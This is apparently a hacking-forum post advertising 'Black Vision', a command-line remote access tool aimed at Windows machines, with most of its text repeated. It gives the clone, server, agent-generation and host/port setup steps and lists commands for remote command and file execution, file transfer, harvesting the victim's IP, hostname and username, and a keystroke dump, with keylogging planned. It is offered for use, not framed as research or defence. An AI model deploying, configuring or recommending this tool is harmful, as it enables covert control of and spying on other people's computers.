dEEpEst
☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
- Joined
- Mar 29, 2018
- Messages
- 13,861
- Solutions
- 4
- Reputation
- 32
- Reaction score
- 45,552
- Points
- 1,813
- Credits
- 55,350
7 Years of Service
56%
Black Vision
Command line Remote Access tool targeting Windows Systems.
Download Maxmind GeoIP2 Database from here ;
Extract the file under blackvision/
How to use
Install required modules
pip3 install -r requirements.txt
Run server
Generate Agent
Change Host/Port
Open settings.ini. And change host, port.
Commands
Command
Purpose
transfer
Transfer a NON Binary file.
bsendfile
Transfer a Binary File.
kill
Kill the connection
info
View Information of client.
msgbox
Send Messageboxes.
exec
Execute a Command on the remote Machine(s).
exec-file
Execute a file on the remote Machine(s).
wanip
View WAN IP of Remote Machine(s).
hostname
View Hostname of Remote Machine(s).
username
View Username of Remote Machine(s).
monitoroff
Turn of monitor of Remote Machine(s).
monitoron
Turn monitor back on.
cdopen
Eject CDROM of Remote Machine(s).
cdclose
Close CDROM of Remote Machine(s).
playaudio
Play Audio stream on Remote Machine(s).
send
Send commands to 1 client. (NO broadcast)
keydump
DUMP Keystroke buffer (Not added yet)
Termux Compatibilty
This app is compatible with Termux. Run it the same way you run it in Terminal.
TODO
Video Example:
Download:
This link is hidden for visitors. Please Log in or register now.
Command line Remote Access tool targeting Windows Systems.
Download Maxmind GeoIP2 Database from here ;
This link is hidden for visitors. Please Log in or register now.
Extract the file under blackvision/
How to use
Install required modules
pip3 install -r requirements.txt
Run server
Code:
git clone https://github.com/lynxmk/blackvision.git
cd blackvision
python3 main.py
Generate Agent
Code:
cd blackvision
python3 generate.py
Change Host/Port
Open settings.ini. And change host, port.
Commands
Command
Purpose
transfer
Transfer a NON Binary file.
bsendfile
Transfer a Binary File.
kill
Kill the connection
info
View Information of client.
msgbox
Send Messageboxes.
exec
Execute a Command on the remote Machine(s).
exec-file
Execute a file on the remote Machine(s).
wanip
View WAN IP of Remote Machine(s).
hostname
View Hostname of Remote Machine(s).
username
View Username of Remote Machine(s).
monitoroff
Turn of monitor of Remote Machine(s).
monitoron
Turn monitor back on.
cdopen
Eject CDROM of Remote Machine(s).
cdclose
Close CDROM of Remote Machine(s).
playaudio
Play Audio stream on Remote Machine(s).
send
Send commands to 1 client. (NO broadcast)
keydump
DUMP Keystroke buffer (Not added yet)
Termux Compatibilty
This app is compatible with Termux. Run it the same way you run it in Terminal.
TODO
- Rewrite Agent in C.
- Fix sending file to single client. (Fixed)
- Fix multiple clients information saving. (Fixed)
- Add keylogging.
- Fix that args[3] does not get sent. (Fixed)
- Fix Broken connection problems.
Video Example:
To see this hidden content, you must like this content.
To see this hidden content, you must like this content.